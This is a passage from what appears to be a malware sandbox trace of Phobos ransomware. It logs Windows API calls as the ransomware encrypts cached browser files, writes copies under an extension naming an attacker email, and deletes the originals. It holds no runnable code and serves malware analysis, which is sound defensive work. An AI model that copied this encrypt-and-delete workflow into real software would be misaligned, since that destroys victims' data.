dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.807] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\uhf-west-european-default.min[1].css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\uhf-west-european-default.min[1].css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.808] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0176.808] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.808] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1c85b, lpOverlapped=0x0) returned 1 [0176.814] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1c860, dwBufLen=0x1c860 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1c860) returned 1 [0176.815] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1c860, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1c860, lpOverlapped=0x0) returned 1 [0176.817] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0176.817] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.817] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0176.817] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.818] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0176.818] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.818] CloseHandle (hObject=0x190) returned 1 [0176.818] CloseHandle (hObject=0x17c) returned 1 [0176.818] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\uhf-west-european-default.min[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\uhf-west-european-default.min[1].css")) returned 1 [0176.820] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\000000929096[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\000000929096[1].gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.868] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=58453) returned 1 [0176.868] CloseHandle (hObject=0x14c) returned 1 [0176.868] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\000000929096[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\000000929096[1].gif")) returned 0x2020 [0176.868] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\000000929096[1].gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\000000929096[1].gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\000000929096[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\000000929096[1].gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.868] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.868] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\000000929096[1].gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\000000929096[1].gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.869] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0176.869] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.869] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xe455, lpOverlapped=0x0) returned 1 [0176.881] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe460, dwBufLen=0xe460 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe460) returned 1 [0176.882] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe460, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe460, lpOverlapped=0x0) returned 1 [0176.883] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0176.883] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.883] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0176.883] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.883] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0176.883] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.883] CloseHandle (hObject=0x14c) returned 1 [0176.883] CloseHandle (hObject=0x178) returned 1 [0176.884] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\000000929096[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\000000929096[1].gif")) returned 1 [0176.885] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA429NP[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa429np[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.885] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=613) returned 1 [0176.885] CloseHandle (hObject=0x178) returned 1 [0176.885] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA429NP[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa429np[1].png")) returned 0x2020 [0176.885] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA429NP[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa429np[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA429NP[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa429np[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.886] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.886] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA429NP[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa429np[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.886] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0176.886] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.886] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x265, lpOverlapped=0x0) returned 1 [0176.898] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x270, dwBufLen=0x270 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x270) returned 1 [0176.898] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x270, lpOverlapped=0x0) returned 1 [0176.898] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0176.899] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.899] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.899] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.899] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.899] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.899] CloseHandle (hObject=0x178) returned 1 [0176.899] CloseHandle (hObject=0x14c) returned 1 [0176.899] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA429NP[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa429np[1].png")) returned 1 [0176.900] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA61AKN[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa61akn[2].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.913] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=584) returned 1 [0176.913] CloseHandle (hObject=0x14c) returned 1 [0176.913] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA61AKN[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa61akn[2].png")) returned 0x2020 [0176.913] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA61AKN[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa61akn[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA61AKN[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa61akn[2].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.913] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.913] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA61AKN[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa61akn[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.914] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0176.914] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.914] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x248, lpOverlapped=0x0) returned 1 [0176.925] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x250, dwBufLen=0x250 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x250) returned 1 [0176.925] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x250, lpOverlapped=0x0) returned 1 [0176.933] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0176.933] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.933] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.933] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.933] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.933] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.933] CloseHandle (hObject=0x14c) returned 1 [0176.933] CloseHandle (hObject=0x178) returned 1 [0176.933] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AA61AKN[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aa61akn[2].png")) returned 1 [0176.934] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAkhMz9[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aakhmz9[2].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.935] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=739) returned 1 [0176.935] CloseHandle (hObject=0x178) returned 1 [0176.935] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAkhMz9[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aakhmz9[2].png")) returned 0x2020 [0176.935] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAkhMz9[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aakhmz9[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.935] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAkhMz9[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aakhmz9[2].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0176.935] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.935] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.935] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAkhMz9[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aakhmz9[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0176.936] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0176.936] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.936] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2e3, lpOverlapped=0x0) returned 1 [0176.954] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2f0, dwBufLen=0x2f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2f0) returned 1 [0176.954] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2f0, lpOverlapped=0x0) returned 1 [0176.955] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0176.955] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.955] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.955] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.955] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.956] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.956] CloseHandle (hObject=0x178) returned 1 [0176.956] CloseHandle (hObject=0x14c) returned 1 [0176.956] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\AAkhMz9[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\aakhmz9[2].png")) returned 1 [0176.957] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.957] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 